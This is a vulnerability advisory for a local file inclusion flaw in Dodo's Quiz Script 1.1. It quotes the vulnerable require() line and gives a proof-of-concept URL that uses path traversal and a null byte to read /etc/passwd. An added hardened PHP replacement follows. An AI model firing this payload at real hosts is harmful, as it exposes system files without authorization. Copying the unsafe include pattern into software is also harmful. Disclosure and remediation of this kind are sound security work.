Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability

2009-01-20 20:01:46


Discovered by cOndemned
Greetz: str0ke, sid.psycho & TWT, Alfons Luja

Download : http://regretless.com/scripts/dodosdownload.php?action=download&n=1


source of dodosquiz.php (lines 25-27):

[ ... ]

if(!$_GET['n'])
    exit;
require("quiz_".$_GET['n'].".php"); # lfi

[ ... ]


proof of concept:

http://[host]/[dodos_quiz_path]/dodosquiz.php?n=/../../../../etc/passwd%00
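A hardened replacement for the require() shown above, given here as an added example; it is not part of the original advisory and is not the script author's code. It assumes quiz files sit next to dodosquiz.php as quiz_<id>.php with ids made only of letters, digits, underscore or hyphen; the helper name resolve_quiz_file is hypothetical.

```php
<?php
// Added example: allowlist + canonical-path check in place of
//   require("quiz_".$_GET['n'].".php");
// Assumption: quiz files are stored beside this script as quiz_<id>.php.

function resolve_quiz_file($n, $baseDir)   // hypothetical helper name
{
    // Reject arrays (?n[]=x) and anything outside the allowlist. One check
    // covers "/", "..", and the PoC's %00 (NUL), which older PHP builds
    // treat as the end of the path and so drop the appended ".php".
    if (!is_string($n) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $n)) {
        return false;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . 'quiz_' . $n . '.php');

    // realpath() returns false for missing files and resolves symlinks, so a
    // link placed in the quiz directory cannot point the include elsewhere.
    if ($base === false || $path === false) {
        return false;
    }

    // The canonical path must still be inside the quiz directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return $path;
}

$n    = isset($_GET['n']) ? $_GET['n'] : null;
$file = resolve_quiz_file($n, __DIR__);

if ($file === false) {
    // Same response for "bad id" and "no such quiz": nothing about the
    // filesystem is disclosed to the client.
    header('HTTP/1.1 404 Not Found');
    exit;
}

require $file;
```

With this check the value from the proof of concept fails the allowlist before any filesystem call is made.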


Fixes

No fixes